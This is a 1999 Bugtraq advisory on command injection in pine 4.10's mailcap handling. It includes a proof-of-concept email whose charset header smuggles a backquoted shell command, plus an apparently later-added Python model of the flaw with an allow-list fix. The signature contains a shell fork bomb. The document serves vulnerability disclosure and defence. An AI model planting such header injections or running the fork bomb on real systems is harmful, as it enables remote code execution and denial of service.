Date:	Mon, 8 Feb 1999 00:22:17 +0100
From:	Michal Zalewski <lcamtuf@IDS.PL>
Subject:      remote exploit on pine 4.10 - neverending story?
To:	BUGTRAQ@NETSPACE.ORG

Affected systems:
-----------------

  Any Un*x system running 'pine' up to version 4.10 (latest).

Compromise:
-----------

  Remote execution of arbitrary code when a message is viewed.

Details:
--------

  About five months ago, I reported a vulnerability in the metamail package
  used with pine. I also noticed that the '`' character is incorrectly
  expanded by pine. The problem has been ignored (probably no one understood
  what I was talking about? ;-). But no matter. An excerpt from /etc/mailcap:

  text/plain; shownonascii iso-8859-1 %s; test=test "`echo %{charset} | tr
  '[A-Z]' '[a-z]'`" = iso-8859-1; copiousoutput

Impact:
-------

  And now, ladies and gentlemen - my old bug, reinvented. Usually, the
  above mailcap line is expanded to:

  [...] execve </bin/sh> (sh) (-c) (test "`echo 'US-ASCII' | tr '[A-Z]'
        '[a-z]'`" = iso-8859-1)

  Hmm, but take a look at this message:

************************** MIME MESSAGE FOLLOWS **************************
From: Attacker <attacker@eleet.net>
To: Victim <victim@somewhere.net>
Subject: Happy birthday
...
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset='US-ASCII'

Make a wish...

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
Content-Transfer-Encoding: BASE64
Content-Description: wish
Content-Disposition: attachment; filename="wish.c"

...it could be your last.
*************************** MIME MESSAGE ENDS ***************************

  The result is:

  [...] execve </bin/sh> (sh) (-c) (test "`echo '``touch${IFS}ME``' | tr
        '[A-Z]' '[a-z]'`" = iso-8859-1)

  ...and arbitrary code ('touch ME', with ${IFS} standing in for the space
  that a header parameter value cannot contain) is executed when the message
  is viewed. The doubled backquotes are what make this work: the shell pairs
  backquotes from left to right, and the single quotes inside the outer
  backquotes do not protect the inner ones, so `echo '` becomes one (broken)
  command substitution, `touch${IFS}ME` a second one that actually runs, and
  the rest of the line a third.
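  To make the data flow concrete, here is an added example (my own code, not
  pine's or metamail's) modelling the three steps: a MIME parser hands the
  raw charset parameter to the mailcap layer, %{charset} is pasted into the
  test= clause in single quotes as the trace above shows, and the result is
  given to sh -c. backquote_bodies() models the Bourne-shell rule that the
  payload relies on, namely that backquotes are paired left to right before
  quotes are interpreted, so a single-quoted value cannot safely contain a
  backquote. The message is the one from this advisory, with the elided
  headers dropped and a closing boundary line added; the allow-list regex,
  the function names and the "sh -c" runner are this example's own choices.
  guarded_expand() is the hardened variant: it rejects any parameter that is
  not a plain charset token, since escaping alone would not help here.

```python
import re
import subprocess
from email import message_from_string

# The mailcap 'test=' clause from the advisory, before %{charset} expansion
# (the whole entry is one line in /etc/mailcap; only the test clause matters
# here).
MAILCAP_TEST = "test \"`echo %{charset} | tr '[A-Z]' '[a-z]'`\" = iso-8859-1"

# The advisory's message, reconstructed as sample input: the elided headers
# are dropped and a closing boundary line is added so a strict MIME parser
# accepts it.
POISONED_MESSAGE = """\
From: Attacker <attacker@eleet.net>
To: Victim <victim@somewhere.net>
Subject: Happy birthday
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset='US-ASCII'

Make a wish...

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
Content-Transfer-Encoding: BASE64
Content-Description: wish
Content-Disposition: attachment; filename="wish.c"

...it could be your last.
--8323328-235065145-918425607=:319--
"""

# Conservative allow-list for charset names: letters, digits, '.', '_', ':'
# and '-'. This is an assumption of the example (stricter than the IANA
# registry rules), chosen so that no quote, backquote, '$' or whitespace can
# ever reach the shell.
CHARSET_TOKEN = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._:-]{0,39}$")


def part_charsets(raw_message):
    """Return the charset parameter of each body part, exactly as a MIME
    parser hands it to the mailcap layer (no validation, quotes untouched)."""
    msg = message_from_string(raw_message)
    parts = msg.get_payload() if msg.is_multipart() else [msg]
    return [part.get_param("charset") for part in parts]


def naive_expand(template, params):
    """Textual %{name} substitution as the advisory's trace shows it: the
    parameter value is wrapped in single quotes and pasted into the command."""
    return re.sub(r"%\{([^}]+)\}",
                  lambda m: "'" + params.get(m.group(1), "") + "'",
                  template)


def backquote_bodies(cmd):
    """Model of how a Bourne shell locates `...` command substitutions: the
    next unescaped backquote after an opening one closes it, and single or
    double quotes in between do not protect it. Returns the bodies the shell
    would execute, in order. Backslash handling is simplified to 'escape the
    next character', which is exact for commands without backslashes."""
    bodies, body, inside, i = [], [], False, 0
    while i < len(cmd):
        ch = cmd[i]
        if ch == "\\" and i + 1 < len(cmd):
            if inside:
                body.append(cmd[i + 1])
            i += 2
            continue
        if ch == "`":
            if inside:
                bodies.append("".join(body))
                body = []
            inside = not inside
        elif inside:
            body.append(ch)
        i += 1
    return bodies


def guarded_expand(template, params):
    """Hardened variant: refuse any parameter that is not a plain charset
    token before it gets near sh -c. Quoting is not a fix, because backquotes
    are matched before the quotes around them are interpreted."""
    for name, value in params.items():
        if value is None or not CHARSET_TOKEN.match(value):
            raise ValueError("rejecting %s=%r: not a plain charset token"
                             % (name, value))
    return naive_expand(template, params)


def run_mailcap_test(cmd):
    """Run an expanded test= clause the way mailcap consumers do, via sh -c.
    Exit status 0 means the mailcap entry is selected for the part."""
    return subprocess.run(["sh", "-c", cmd], check=False).returncode


if __name__ == "__main__":
    benign, poisoned = part_charsets(POISONED_MESSAGE)
    print("charsets as parsed:", repr(benign), repr(poisoned))
    cmd = naive_expand(MAILCAP_TEST, {"charset": poisoned})
    print("naive expansion:", cmd)
    for body in backquote_bodies(cmd):
        print("  shell would run:", repr(body))
    try:
        guarded_expand(MAILCAP_TEST, {"charset": poisoned})
    except ValueError as err:
        print("guarded expansion:", err)
    safe_cmd = guarded_expand(MAILCAP_TEST, {"charset": "ISO-8859-1"})
    print("sh -c exit status for ISO-8859-1:", run_mailcap_test(safe_cmd))
```

  Run it directly to see the three substitution bodies the shell would
  execute for the poisoned part; the guarded path only ever reaches sh -c
  with a value that cannot contain a quote, a backquote or a space.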

Fix:
----

  Well, it's the second time I have reported problems with ` in headers.
  Maybe pine developers should wait a little longer ;-)

_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM]
[lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
To iterate is human, to recurse divine [P. Deutsch]